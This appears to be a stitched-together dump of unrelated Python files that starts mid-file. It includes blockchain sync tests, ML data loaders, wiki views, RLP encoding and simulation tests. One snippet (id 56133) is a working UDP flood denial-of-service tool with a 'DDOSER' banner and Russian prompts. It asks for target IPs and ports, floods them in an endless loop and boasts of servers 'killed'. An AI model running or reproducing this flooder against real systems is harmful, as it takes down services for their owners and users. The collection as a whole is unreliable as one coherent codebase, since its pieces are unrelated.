base_network.FLIP_HORIZONTALLY: flip_horizontally})
return l
|
56048
|
import random
from hathor.crypto.util import decode_address
from hathor.graphviz import GraphvizVisualizer
from hathor.simulator import FakeConnection
from tests import unittest
from tests.utils import add_blocks_unlock_reward
class BaseHathorSyncMempoolTestCase(unittest.TestCase):
__test__ = False
def setUp(self):
super().setUp()
self.network = 'testnet'
self.manager1 = self.create_peer(self.network, unlock_wallet=True)
self.manager1.avg_time_between_blocks = 4
self.genesis = self.manager1.tx_storage.get_all_genesis()
self.genesis_blocks = [tx for tx in self.genesis if tx.is_block]
def _add_new_tx(self, address, value):
from hathor.transaction import Transaction
from hathor.wallet.base_wallet import WalletOutputInfo
outputs = []
outputs.append(
WalletOutputInfo(address=decode_address(address), value=int(value), timelock=None))
tx = self.manager1.wallet.prepare_transaction_compute_inputs(Transaction, outputs, self.manager1.tx_storage)
tx.timestamp = int(self.clock.seconds())
tx.storage = self.manager1.tx_storage
tx.weight = 10
tx.parents = self.manager1.get_new_tx_parents()
tx.resolve()
tx.verify()
self.manager1.propagate_tx(tx)
self.clock.advance(10)
return tx
def _add_new_transactions(self, num_txs):
txs = []
for _ in range(num_txs):
address = self.get_address(0)
value = random.choice([5, 10, 50, 100, 120])
tx = self._add_new_tx(address, value)
txs.append(tx)
return txs
def _add_new_block(self, propagate=True):
block = self.manager1.generate_mining_block()
self.assertTrue(block.resolve())
block.verify()
self.manager1.on_new_tx(block, propagate_to_peers=propagate)
self.clock.advance(10)
return block
def _add_new_blocks(self, num_blocks, propagate=True):
blocks = []
for _ in range(num_blocks):
blocks.append(self._add_new_block(propagate=propagate))
return blocks
def test_mempool_basic(self):
        # 2 blocks
self._add_new_blocks(2)
# N blocks to unlock the reward
add_blocks_unlock_reward(self.manager1)
# 5 transactions to be confirmed by the next blocks
self._add_new_transactions(5)
# 2 more blocks
self._add_new_blocks(2)
# 30 transactions in the mempool
self._add_new_transactions(30)
debug_pdf = False
if debug_pdf:
dot1 = GraphvizVisualizer(self.manager1.tx_storage, include_verifications=True, include_funds=True).dot()
dot1.render('mempool-test')
manager2 = self.create_peer(self.network, enable_sync_v1=True)
self.assertEqual(manager2.state, manager2.NodeState.READY)
conn = FakeConnection(self.manager1, manager2)
for _ in range(1000):
if conn.is_empty():
break
conn.run_one_step(debug=True)
self.clock.advance(1)
self.assertConsensusValid(self.manager1)
self.assertConsensusValid(manager2)
self.assertConsensusEqual(self.manager1, manager2)
# 3 genesis
# 25 blocks
# Unlock reward blocks
# 8 txs
self.assertEqual(len(manager2.tx_storage._mempool_tips_index), 1)
self.assertEqual(len(self.manager1.tx_storage._mempool_tips_index), 1)
class SyncV1HathorSyncMempoolTestCase(unittest.SyncV1Params, BaseHathorSyncMempoolTestCase):
__test__ = True
class SyncV2HathorSyncMempoolTestCase(unittest.SyncV2Params, BaseHathorSyncMempoolTestCase):
__test__ = True
# sync-bridge should behave like sync-v2
class SyncBridgeHathorSyncMempoolTestCase(unittest.SyncBridgeParams, SyncV2HathorSyncMempoolTestCase):
pass
|
56133
|
import os
import socket
import time
from textwrap import dedent
def attack(ip, port):
global sent
global max
sock.sendto(str.encode(bytes), (ip, int(port)))
sent += 1
print(
"\033[36m%s пакетов убила сервер (остановка Ctrl+z) - %s:%s" % (sent, ip, port)
)
if mode == "y":
if sent == max:
max += 1000
time.sleep(0.5)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
os.system("clear")
print(
dedent(
"""\
\033[33m
██████╗░██████╗░░█████╗░░██████╗███████╗██████╗░
██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗
██║░░██║██║░░██║██║░░██║╚█████╗░█████╗░░██████╔╝
██║░░██║██║░░██║██║░░██║░╚═══██╗██╔══╝░░██╔══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝███████╗██║░░██║
╚═════╝░╚═════╝░░╚════╝░╚═════╝░╚══════╝╚═╝░░╚═╝
Made by pkgsearch\n"""
)
)
bytes = "qwerty" * 2000
sent = 0
max = 1000
ips = input("\033[36mIP/Host нехорошего сайта (127.0.0.1; 127.0.0.1,192.168.1.1): ")
ips = (ips + ",").split(",")
ips.pop()
ports = input("\033[36mСколько портов использовать? (80; 80,8080,443; all): ")
if ports != "all":
ports = (ports + ",").split(",")
ports.pop()
mode = "\033[36mВключить медленный режим? (y; n): "
os.system("clear")
print("Запуск...")
time.sleep(0.5)
port_for_fast = 1
while True:
for ip in ips:
try:
if ports != "all":
for port in ports:
attack(ip, port)
else:
attack(ip, port_for_fast)
port_for_fast += 1
if port_for_fast == 65536:
port_for_fast = 1
except:
print("\033[36mСервер (остановка Ctrl+z) " + ip + " уничтожен!")
|
56146
|
import numpy as np
from multiprocessing import Process, Queue
from mxnet.io import DataIter, DataBatch
import mxnet as mx
from PIL import Image
import os
import preprocessing
import logging
import sys
#rgb_mean=(140.5192, 59.6655, 63.8419), #mean on tote trainval
class TrainDataIterator(DataIter):
def __init__(self,
root_dir,
flist_path,
rgb_mean=(128,128,128),
random_flip=True,
random_scale=False,
random_rotate=True,
scale_range=(0.8, 1.2),
crop_size=400,
random_crop=True,
epoch_size=True,
label_shrink_scale=1.0,
shuffle=True,
data_queue_size=100,
batch_size=1,
data_worker_num=1):
self.rgb_mean = np.array(rgb_mean, dtype=np.uint8).reshape((1,1,3))
self.random_flip = random_flip
self.random_scale = random_scale
self.random_rotate = random_rotate
self.scale_range = scale_range
assert scale_range[1]>=scale_range[0]>0
self.crop_size = crop_size
self.label_shrink_scale = label_shrink_scale
self.random_crop = random_crop
self.epoch_size = epoch_size
self.data_count = 0
self.shuffle = shuffle
self.batch_size = batch_size
self.flist = None
self.root_dir = root_dir
self._load_flist(flist_path)
self.data_num = self.get_data_num()
self.avail_data_num = self.data_num
self.cursor = 0
self.reset_list()
self.flist_item_queue = Queue(maxsize=1000)
self.list_producer = Process(target=self._produce_flist_item)
self.list_producer.daemon = True
self.list_producer.start()
self.data_queue = Queue(maxsize=data_queue_size)
for i in range(data_worker_num):
producer = Process(target=self._produce_data)
producer.daemon = True
producer.start()
def _produce_flist_item(self):
while True:
if self.cursor + 1 <= self.data_num:
file = self.flist[self.cursor]
self.flist_item_queue.put(file)
self.cursor += 1
else:
self.reset_list()
def _produce_data(self):
while True:
flist_item = self.flist_item_queue.get()
value = self._process_data(flist_item)
if value is not None:
self.data_queue.put(value)
def get_data(self):
images = []
labels = []
for i in range(self.batch_size):
data = self.data_queue.get()
images.append(data[0])
labels.append(data[1])
images = np.concatenate(images)
labels = np.concatenate(labels)
return (mx.nd.array(images), mx.nd.array(labels))
def get_data_num(self):
return len(self.flist)
def _load_flist(self,
flist_path):
with open(flist_path) as f:
lines = f.readlines()
self.flist = []
for line in lines:
if len(line.rstrip()) == 0:
continue
item = self._parse_flist_item(line.rstrip())
self.flist.append(item)
self.data_num = len(self.flist)
def reset_list(self):
self.cursor = 0
if self.shuffle:
np.random.shuffle(self.flist)
def _process_data(self, item):
try:
im = Image.open(os.path.join(self.root_dir, item[0]))
im = im.convert("RGB")
l = Image.open(os.path.join(self.root_dir, item[1]))
except Exception as e:
logging.info(e)
return None
if self.random_rotate:
deg = np.random.rand(1) * 360
im=im.rotate(deg, resample=Image.BICUBIC, expand=True)
l=l.rotate(deg, resample=Image.NEAREST, expand=True)
im_arr = np.array(im)
l_arr = np.array(l)
r_start, c_start, new_crop_size = preprocessing.calc_crop_params(im_arr, self.scale_range, self.crop_size)
#random flip
if self.random_flip:
im_arr, l_arr = preprocessing.random_flip(im_arr, l_arr)
im_arr, l_arr = preprocessing.pad_image(im_arr, l_arr, new_crop_size, self.rgb_mean)
#do crop
if self.random_crop:
im_arr = im_arr[r_start:r_start+new_crop_size, c_start:c_start+new_crop_size, :]
l_arr = l_arr[r_start:r_start+new_crop_size, c_start:c_start+new_crop_size]
#do resize
im_arr = Image.fromarray(im_arr).resize((self.crop_size, self.crop_size), Image.BICUBIC)
im_arr = np.array(im_arr, dtype=np.float32)
im_arr -= self.rgb_mean
l_dim = int(self.crop_size*self.label_shrink_scale)
l_arr = Image.fromarray(l_arr).resize((l_dim, l_dim), Image.NEAREST)
l_arr = np.array(l_arr, dtype=np.uint8)
im_arr = np.expand_dims(im_arr, 0)
im_arr = np.transpose(im_arr, [0, 3, 1, 2])
l_arr = l_arr.reshape(1, -1)
return (im_arr, l_arr)
def _parse_flist_item(self, line):
items = line.split("\t")
assert len(items) == 2
im = items[0]
l = items[1]
return (im, l)
@property
def provide_data(self):
return [("data", (self.batch_size, 3, self.crop_size, self.crop_size))]
@property
def provide_label(self):
label_dim = int(self.crop_size*self.label_shrink_scale)
return [("softmax_label", (self.batch_size, label_dim*label_dim))]
def reset(self):
self.data_count = 0
pass
def iter_next(self):
self.data_count += self.batch_size
return self.data_count <= self.epoch_size*self.batch_size
def next(self):
if self.iter_next():
data = self.get_data()
return DataBatch(data=[data[0]], label=[data[1]], pad=None, index=None)
else:
raise StopIteration
|
56169
|
import urllib.parse
from wikked.db.base import NoWantedPages
from wikked.page import WantedPage
from wikked.utils import get_absolute_url
from wikked.webimpl import (
get_page_meta, get_page_or_raise, make_page_title,
is_page_readable, get_redirect_target,
get_or_build_pagelist, get_generic_pagelist_builder,
UserPermissionError, CircularRedirectError, RedirectNotFoundError)
def build_pagelist_view_data(pages, user):
pages = sorted(pages, key=lambda p: p.url)
data = [get_page_meta(p) for p in pages if is_page_readable(p, user)]
result = {'pages': data}
return result
def generic_pagelist_view(wiki, user, list_name, filter_func, fields=None):
fields = fields or ['url', 'title', 'local_meta', 'meta']
pages = get_or_build_pagelist(
wiki,
list_name,
get_generic_pagelist_builder(wiki, filter_func, fields),
fields=fields)
return build_pagelist_view_data(pages, user)
def get_orphans(wiki, user):
def builder_func():
wiki.resolve()
pages = {}
rev_links = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta', 'links']):
pages[p.url] = p
rev_links.setdefault(p.url, 0)
for l in p.links:
abs_l = get_absolute_url(p.url, l)
cnt = rev_links.get(abs_l, 0)
rev_links[abs_l] = cnt + 1
or_pages = []
for tgt, cnt in rev_links.items():
if cnt == 0:
or_pages.append(pages[tgt])
return or_pages
fields = ['url', 'title', 'local_meta', 'meta', 'links']
pages = get_or_build_pagelist(wiki, 'orphans', builder_func, fields)
return build_pagelist_view_data(pages, user)
def get_broken_redirects(wiki, user):
def filter_func(page):
redirect_meta = page.getMeta('redirect')
if redirect_meta is None:
return False
path = get_absolute_url(page.url, redirect_meta)
try:
target, visited = get_redirect_target(
path,
fields=['url', 'local_meta', 'meta'])
except CircularRedirectError:
return True
except RedirectNotFoundError:
return True
return False
return generic_pagelist_view(wiki, user, 'broken_redirects', filter_func)
def get_double_redirects(wiki, user):
def builder_func():
wiki.resolve()
pages = {}
redirs = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta']):
pages[p.url] = p
target = p.getMeta('redirect')
if target:
target = get_absolute_url(p.url, target)
redirs[p.url] = target
dr_pages = []
for src, tgt in redirs.items():
if tgt in redirs:
dr_pages.append(pages[src])
return dr_pages
fields = ['url', 'title', 'local_meta', 'meta']
pages = get_or_build_pagelist(wiki, 'double_redirects', builder_func,
fields)
return build_pagelist_view_data(pages, user)
def get_dead_ends(wiki, user):
def filter_func(page):
return len(page.links) == 0
return generic_pagelist_view(
wiki, user, 'dead_ends', filter_func,
fields=['url', 'title', 'local_meta', 'meta', 'links'])
def get_broken_links(wiki, user):
def builder_func():
wiki.resolve()
pages = set()
page_existence = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta', 'links']):
# Gather all outgoing links from each page, then check which
# of those match another page in the dictionary.
for l in p.links:
abs_l = get_absolute_url(p.url, l)
exists = page_existence.get(abs_l, None)
if exists is None:
# Don't know yet if this URL is valid, so let's ask the
# database and cache the result.
exists = wiki.pageExists(abs_l)
page_existence[abs_l] = exists
if not exists:
pages.add(p)
return pages
fields = ['url', 'title', 'local_meta', 'meta']
pages = get_or_build_pagelist(wiki, 'broken_links', builder_func, fields)
return build_pagelist_view_data(pages, user)
def get_wanted_pages(wiki, user):
def builder_func():
wiki.resolve()
wanted = {}
page_existence = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta', 'links']):
for l in p.links:
abs_l = get_absolute_url(p.url, l)
exists = page_existence.get(abs_l, None)
if exists is None:
exists = wiki.pageExists(abs_l)
page_existence[abs_l] = exists
if not exists:
wanted.setdefault(abs_l, p)
return [WantedPage(u, p) for u, p in wanted.items()]
try:
wanted = sorted(wiki.db.getWantedPages(), key=lambda p: p.url)
except NoWantedPages:
wanted = None
if wanted is None:
wanted = builder_func()
wiki.db.saveWantedPages(wanted)
data = []
for w in wanted:
d = {'url': urllib.parse.quote(w.url.encode('utf-8')),
'title': make_page_title(w.url),
'wanted_by': {
'url': urllib.parse.quote(w.wanted_by.url.encode('utf-8')),
'title': w.wanted_by.title}
}
data.append(d)
result = {'wanted_pages': data}
return result
def list_pages(wiki, user, url=None):
pages = [p for p in wiki.getPages(url) if is_page_readable(p, user)]
page_metas = [get_page_meta(page) for page in pages]
result = {'path': url, 'pages': list(page_metas)}
return result
def get_search_results(wiki, user, query):
readable_hits = []
hits = list(wiki.index.search(query))
for h in hits:
try:
get_page_or_raise(wiki, h.url,
check_perms=(user, 'read'))
except UserPermissionError:
continue
readable_hits.append({
'url': h.url,
'title': h.title,
'text': h.hl_text})
result = {
'query': query,
'hit_count': len(readable_hits),
'hits': readable_hits}
return result
def get_search_preview_results(wiki, user, query):
readable_hits = []
hits = list(wiki.index.previewSearch(query))
for h in hits:
try:
get_page_or_raise(wiki, h.url,
check_perms=(user, 'read'))
except UserPermissionError:
continue
readable_hits.append({'url': h.url, 'title': h.title})
result = {
'query': query,
'hit_count': len(readable_hits),
'hits': readable_hits}
return result
|
56173
|
import sys
class InvariantParser:
'''
The InvariantParser is used to parse a Daikon-generated invariants file into a
dictionary mapping program points (ppts) to their invariants.
'''
# Path of the invariants file to be parsed.
filepath = ""
# String used to match entry separating lines in the invariants file.
separator_str = ""
def __init__(self, filepath):
'''
Return a InvariantParser object which is set to parse the file located at
*filepath*.
'''
self.filepath = filepath
self.separator_str = "==========================================================================="
def parse_invariants(self):
'''
Return a dictionary mapping ppts (strings) to sets of invariants (lists of
strings) parsed from the initialized invariants file.
'''
rtn_dict = {}
with open(self.filepath) as f:
contents = f.read()
for entry in contents.split(self.separator_str):
entry = entry.strip().split("\n")
rtn_dict[entry[0]] = entry[1:]
return rtn_dict
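# Usage sketch (the invariants file path below is an assumption):
# parser = InvariantParser("daikon-output/Example.inv.txt")
# ppt_to_invariants = parser.parse_invariants()
# for ppt, invariants in ppt_to_invariants.items():
#     print(ppt, len(invariants))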
|
56234
|
from ray.rllib.utils import try_import_tf, try_import_torch
tf = try_import_tf()
torch, nn = try_import_torch()
def explained_variance(y, pred, framework="tf"):
if framework == "tf":
_, y_var = tf.nn.moments(y, axes=[0])
_, diff_var = tf.nn.moments(y - pred, axes=[0])
return tf.maximum(-1.0, 1 - (diff_var / y_var))
else:
y_var = torch.var(y, dim=[0])
diff_var = torch.var(y - pred, dim=[0])
min_ = torch.Tensor([-1.0])
return torch.max(
min_.to(
device=torch.device("cuda")
) if torch.cuda.is_available() else min_,
1 - (diff_var / y_var)
)
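# Illustrative note (assuming eager/session execution as appropriate for the framework):
# explained variance is 1 - Var(y - pred) / Var(y), clipped below at -1, so a perfect
# prediction, e.g. explained_variance(y, y), evaluates to 1.0 on both code paths.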
|
56318
|
from typing import Union, Callable, Type, Dict, Any
from ray.rllib import MultiAgentEnv, Policy
from ray.rllib.agents import Trainer
from ray.rllib.models import ModelV2
from ray.rllib.utils.typing import ResultDict
from grl.algos.nxdo.nxdo_manager.manager import SolveRestrictedGame
from grl.rl_apps.scenarios.scenario import RayScenario, Scenario
from grl.rl_apps.scenarios.stopping_conditions import StoppingCondition
def nxdo_default_log_filter(result: ResultDict) -> bool:
return "avg_policy_exploitability" in result or result["training_iteration"] % 10 == 0
class NXDOScenario(RayScenario):
def __init__(self,
name: str,
ray_cluster_cpus: Union[int, float],
ray_cluster_gpus: Union[int, float],
ray_object_store_memory_cap_gigabytes: Union[int, float],
use_openspiel_restricted_game: bool,
get_restricted_game_custom_model: Union[None, Callable[[MultiAgentEnv], Union[None, Type[ModelV2]]]],
xdo_metanash_method: str,
allow_stochastic_best_responses: bool,
get_restricted_game_solver: Callable[[Scenario], SolveRestrictedGame],
env_class: Type[MultiAgentEnv],
env_config: Dict[str, Any],
trainer_class_br: Type[Trainer],
policy_classes_br: Dict[str, Type[Policy]],
get_trainer_config_br: Callable[[MultiAgentEnv], Dict[str, Any]],
get_stopping_condition_br: Callable[[], StoppingCondition],
trainer_class_nfsp: Type[Trainer],
avg_trainer_class_nfsp: Type[Trainer],
policy_classes_nfsp: Dict[str, Type[Policy]],
anticipatory_param_nfsp: float,
get_trainer_config_nfsp: Callable[[MultiAgentEnv], Dict[str, Any]],
get_avg_trainer_config_nfsp: Callable[[MultiAgentEnv], Dict[str, Any]],
calculate_openspiel_metanash: bool,
calculate_openspiel_metanash_at_end: bool,
calc_metanash_every_n_iters: Union[None, int],
metanash_metrics_smoothing_episodes_override: Union[None, int],
ray_should_log_result_filter: Callable[[ResultDict], bool] = nxdo_default_log_filter):
super().__init__(name=name,
ray_cluster_cpus=ray_cluster_cpus,
ray_cluster_gpus=ray_cluster_gpus,
ray_object_store_memory_cap_gigabytes=ray_object_store_memory_cap_gigabytes,
ray_should_log_result_filter=ray_should_log_result_filter)
self.use_openspiel_restricted_game = use_openspiel_restricted_game
self.get_restricted_game_custom_model = get_restricted_game_custom_model
self.xdo_metanash_method = xdo_metanash_method
self.allow_stochastic_best_responses = allow_stochastic_best_responses
self.get_restricted_game_solver = get_restricted_game_solver
self.env_class = env_class
self.env_config = env_config
self.trainer_class_br = trainer_class_br
self.policy_classes_br = policy_classes_br
self.get_trainer_config_br = get_trainer_config_br
self.get_stopping_condition_br = get_stopping_condition_br
self.trainer_class_nfsp = trainer_class_nfsp
self.avg_trainer_class_nfsp = avg_trainer_class_nfsp
self.policy_classes_nfsp = policy_classes_nfsp
self.anticipatory_param_nfsp = anticipatory_param_nfsp
self.get_trainer_config_nfsp = get_trainer_config_nfsp
self.get_avg_trainer_config_nfsp = get_avg_trainer_config_nfsp
self.calculate_openspiel_metanash = calculate_openspiel_metanash
self.calculate_openspiel_metanash_at_end = calculate_openspiel_metanash_at_end
self.calc_metanash_every_n_iters = calc_metanash_every_n_iters
self.metanash_metrics_smoothing_episodes_override = metanash_metrics_smoothing_episodes_override
|
56333
|
import pickle
import random
import cv2 as cv
import numpy as np
import torch
from torch.utils.data import Dataset
from torchvision import transforms
from config import pickle_file, num_workers
from utils import align_face
# Data augmentation and normalization for training
# Just normalization for validation
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
]),
}
class ArcFaceDataset(Dataset):
def __init__(self, split):
with open(pickle_file, 'rb') as file:
data = pickle.load(file)
samples = data['samples']
num_samples = len(samples)
        num_train = num_samples
        if split == 'train':
            self.samples = samples[:num_train]
            self.transformer = data_transforms['train']
        else:
            # Fall back to the validation transform for any non-train split
            # so the attributes used by __getitem__ are always defined.
            self.samples = samples[num_train:]
            self.transformer = data_transforms['val']
def __getitem__(self, i):
sample = self.samples[i]
full_path = sample['full_path']
landmarks = sample['landmarks']
try:
img = align_face(full_path, landmarks)
except Exception:
print('full_path: ' + full_path)
raise
img = transforms.ToPILImage()(img)
img = self.transformer(img)
class_id = sample['class_id']
return img, class_id
def __len__(self):
return len(self.samples)
def shuffle(self):
np.random.shuffle(self.samples)
def show_align():
with open(pickle_file, 'rb') as file:
data = pickle.load(file)
samples = random.sample(data['samples'], 10)
for i, sample in enumerate(samples):
full_path = sample['full_path']
landmarks = sample['landmarks']
raw = cv.imread(full_path)
raw = cv.resize(raw, (224, 224))
img = align_face(full_path, landmarks)
filename = 'images/{}_raw.jpg'.format(i)
cv.imwrite(filename, raw)
filename = 'images/{}_img.jpg'.format(i)
cv.imwrite(filename, img)
if __name__ == "__main__":
train_dataset = ArcFaceDataset('train')
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=256, shuffle=True,
num_workers=num_workers,
pin_memory=True)
print(len(train_dataset))
print(len(train_loader))
|
56356
|
import FWCore.ParameterSet.Config as cms
# Remove duplicates from the electron list
electronsNoDuplicates = cms.EDFilter("DuplicatedElectronCleaner",
## reco electron input source
electronSource = cms.InputTag("gsfElectrons"),
)
|
56396
|
def byte(n):
return bytes([n])
def rlp_encode_bytes(x):
if len(x) == 1 and x < b'\x80':
# For a single byte whose value is in the [0x00, 0x7f] range,
# that byte is its own RLP encoding.
return x
elif len(x) < 56:
# Otherwise, if a string is 0-55 bytes long, the RLP encoding
# consists of a single byte with value 0x80 plus the length of
# the string followed by the string. The range of the first
# byte is thus [0x80, 0xb7].
return byte(len(x) + 0x80) + x
else:
length = to_binary(len(x))
# If a string is more than 55 bytes long, the RLP encoding
# consists of a single byte with value 0xb7 plus the length in
# bytes of the length of the string in binary form, followed by
# the length of the string, followed by the string. For example,
# a length-1024 string would be encoded as \xb9\x04\x00 followed
# by the string. The range of the first byte is thus [0xb8, 0xbf].
return byte(len(length) + 0xb7) + length + x
def rlp_encode_list(xs):
sx = b''.join(rlp_encode(x) for x in xs)
if len(sx) < 56:
# If the total payload of a list (i.e. the combined length of all
# its items being RLP encoded) is 0-55 bytes long, the RLP encoding
# consists of a single byte with value 0xc0 plus the length of the
# list followed by the concatenation of the RLP encodings of the
# items. The range of the first byte is thus [0xc0, 0xf7].
return byte(len(sx) + 0xc0) + sx
else:
length = to_binary(len(sx))
# If the total payload of a list is more than 55 bytes long, the
# RLP encoding consists of a single byte with value 0xf7 plus the
# length in bytes of the length of the payload in binary form,
# followed by the length of the payload, followed by the concatenation
# of the RLP encodings of the items. The range of the first byte is
# thus [0xf8, 0xff].
return byte(len(length) + 0xf7) + length + sx
def rlp_encode(x):
if isinstance(x,bytes):
return rlp_encode_bytes(x)
elif isinstance(x,list):
return rlp_encode_list(x)
    else:
        raise TypeError("unsupported type for RLP encoding: %r" % type(x))
# encodes an integer as bytes, big-endian
def to_binary(n):
return n.to_bytes((n.bit_length() + 7) // 8, 'big')
assert(rlp_encode(b'dog').hex() == '83646f67')
assert(rlp_encode([[], [[]], [[], [[]]]]).hex() == 'c7c0c1c0c3c0c1c0')
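# Two more sanity checks drawn from the canonical RLP examples
# (the empty string and a short list of strings):
assert(rlp_encode(b'').hex() == '80')
assert(rlp_encode([b'cat', b'dog']).hex() == 'c88363617483646f67')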
|
56413
|
pm = sm.getChr().getPotentialMan()
pm.addPotential(pm.generateRandomPotential(1))
sm.completeQuestNoRewards(12394)
sm.dispose()
|
56415
|
class UpdateIpExclusionObject:
def __init__(self, filterIp, ipFilterId):
self.filterIp = filterIp
self.ipFilterId = ipFilterId
self.memo = None
|
56422
|
import pytest
from streaming_form_data.validators import MaxSizeValidator, ValidationError
def test_max_size_validator_empty_input():
validator = MaxSizeValidator(0)
with pytest.raises(ValidationError):
validator('x')
def test_max_size_validator_normal():
validator = MaxSizeValidator(5)
for char in 'hello':
validator(char)
with pytest.raises(ValidationError):
validator('x')
|
56424
|
import torch
def model_to_vector(model, emb_layer_name='input_emb'):
"""
get the wordvec weight
:param model:
:param emb_layer_name:
:return:
"""
sd = model.state_dict()
return sd[emb_layer_name + '.weight'].cpu().numpy().tolist()
def save_embedding(file_name, embeddings, id2word):
"""
wordvec save to text file
:param file_name:
:param embeddings:
:param id2word:
:return:
"""
fo = open(file_name, 'w')
for idx in range(len(embeddings)):
word = id2word[idx]
embed = embeddings[idx]
embed_list = [str(i) for i in embed]
line_str = ' '.join(embed_list)
fo.write(word + ' ' + line_str + '\n')
fo.close()
def nearest(model, vali_examples, vali_size, id2word_dict, top_k=8):
"""
find the nearest word of vali_examples
:param model: model
:param vali_examples: []
:param vali_size: int
:param id2word_dict: {}
:param top_k: int
:return:
"""
vali_examples = torch.tensor(vali_examples, dtype=torch.long).cuda()
vali_emb = model.predict(vali_examples)
# sim: [batch_size, vocab_size]
sim = torch.mm(vali_emb, model.input_emb.weight.transpose(0, 1))
for i in range(vali_size):
vali_word = id2word_dict[vali_examples[i].item()]
nearest = (-sim[i, :]).sort()[1][1: top_k + 1]
log_str = 'Nearest to %s:' % vali_word
for k in range(top_k):
close_word = id2word_dict[nearest[k].item()]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
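# Minimal sketch tying these helpers together (the model and id2word mapping
# are assumptions, not defined in this module):
#
#   embeddings = model_to_vector(model, emb_layer_name='input_emb')
#   save_embedding('wordvec.txt', embeddings, id2word)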
|
56435
|
import sys
import os
import numpy.random
from amuse.test import amusetest
from amuse.units import units, nbody_system
from amuse.ext.boss_bodenheimer import bb79_cloud
numpy.random.seed(1234567)
class BossBodenheimerTests(amusetest.TestCase):
def test1(self):
numpy.random.seed(1234)
mc=bb79_cloud(targetN=1000).result
self.assertEqual(len(mc),1000)
ek=mc.kinetic_energy()
ep=mc.potential_energy(G=nbody_system.G)
eth=mc.thermal_energy()
self.assertAlmostEqual(eth/ep, -0.25, 2)
self.assertAlmostEqual(ek/ep, -0.2, 2)
def test2(self):
numpy.random.seed(1234)
convert=nbody_system.nbody_to_si(1. | units.MSun,3.2e16| units.cm)
mc=bb79_cloud(targetN=1000,convert_nbody=convert).result
self.assertEqual(len(mc),1000)
ek=mc.kinetic_energy()
ep=mc.potential_energy()
eth=mc.thermal_energy()
self.assertAlmostEqual(eth/ep, -0.25, 2)
self.assertAlmostEqual(ek/ep, -0.2, 2)
|
56455
|
from raytkTools import RaytkTools
# noinspection PyUnreachableCode
if False:
# noinspection PyUnresolvedReferences
from _stubs import *
from ..ropEditor.ropEditor import ROPEditor
iop.ropEditor = ROPEditor(COMP())
class CreateRopDialog:
def __init__(self, ownerComp: 'COMP'):
self.ownerComp = ownerComp
def _setMessageText(self, message):
dat = self.ownerComp.op('set_messageText')
dat.clear()
dat.write(message or '')
def Open(self, _=None):
self.ownerComp.op('window').par.winopen.pulse()
self.ownerComp.op('typeName_field').par.Value0 = ''
self._setMessageText('')
def Close(self, _=None):
self.ownerComp.op('window').par.winclose.pulse()
self._setMessageText('')
def Create(self):
self._setMessageText('')
category = self.ownerComp.op('category_dropmenu').par.Value0.eval()
name = self.ownerComp.op('typeName_field').par.Value0.eval()
try:
rop = RaytkTools().createNewRopType(typeName=name, category=category)
except Exception as err:
self._setMessageText(str(err))
return
iop.ropEditor.LoadROP(rop)
self.Close()
|
56475
|
import logging
import re
import gzip
from pathlib import Path
from argparse import ArgumentParser
from Bio import AlignIO
from make_prg.from_msa import MSA
from make_prg.prg_encoder import PrgEncoder, PRG_Ints
def load_alignment_file(msa_file: str, alignment_format: str) -> MSA:
msa_file = str(msa_file)
logging.info("Read from MSA file %s", msa_file)
if msa_file.endswith(".gz"):
logging.debug("MSA is gzipped")
handle = gzip.open(msa_file, "rt")
alignment = AlignIO.read(handle, alignment_format)
handle.close()
else:
alignment = AlignIO.read(msa_file, alignment_format)
for record in alignment:
record.seq = record.seq.upper()
return alignment
# ************/
# GFA code */
# ***********/
class GFA_Output:
"""
A simple class for converting a PRG string into a GFA file
TODO: Update to GFA2 format
"""
def __init__(self, gfa_string="", gfa_id=0, gfa_site=5):
self.gfa_string = gfa_string
self.gfa_id = gfa_id
self.gfa_site = gfa_site
self.delim_char = " " # This mirrors the AlignedSeq class.
def split_on_site(self, prg_string, site_num):
site_coords = [
(a.start(), a.end())
for a in list(
re.finditer(
"%s%d%s" % (self.delim_char, site_num, self.delim_char), prg_string
)
)
]
last_pos = None
split_strings = []
for (start, end) in site_coords:
split_strings.append(prg_string[last_pos:start])
last_pos = end
split_strings.append(prg_string[last_pos:])
delim = "%s%d%s" % (self.delim_char, site_num, self.delim_char)
check_string = delim.join(split_strings)
assert check_string == prg_string, (
"Something has gone wrong with the string split for site %d\nsplit_"
"strings: %s" % (site_num, split_strings)
)
return split_strings
def build_gfa_string(self, prg_string, pre_var_id=None):
"""Takes prg_string and builds a gfa_string with fragments
from the prg_string."""
end_ids = []
# iterate through sites present, updating gfa_string with each in turn
while str(self.gfa_site) in prg_string:
logging.debug("gfa_site: %d", self.gfa_site)
prgs = self.split_on_site(prg_string, self.gfa_site)
logging.debug("prgs: %s", prgs)
assert len(prgs) == 3, "Invalid prg sequence %s for site %d and id %d" % (
prg_string,
self.gfa_site,
self.gfa_id,
)
# add pre-var site string and links from previous seq fragments
if prgs[0] != "":
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, prgs[0])
else:
# adds an empty node for empty pre var site seqs
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, "*")
pre_var_id = self.gfa_id
self.gfa_id += 1
for id in end_ids:
self.gfa_string += "L\t%d\t+\t%d\t+\t0M\n" % (id, pre_var_id)
end_ids = []
# recursively add segments for each of the variant haplotypes at
# this site, saving the end id for each haplotype
vars = self.split_on_site(prgs[1], self.gfa_site + 1)
assert len(vars) > 1, "Invalid prg sequence %s for site %d and id %d" % (
prg_string,
self.gfa_site + 1,
self.gfa_id,
)
logging.debug("vars: %s", vars)
self.gfa_site += 2
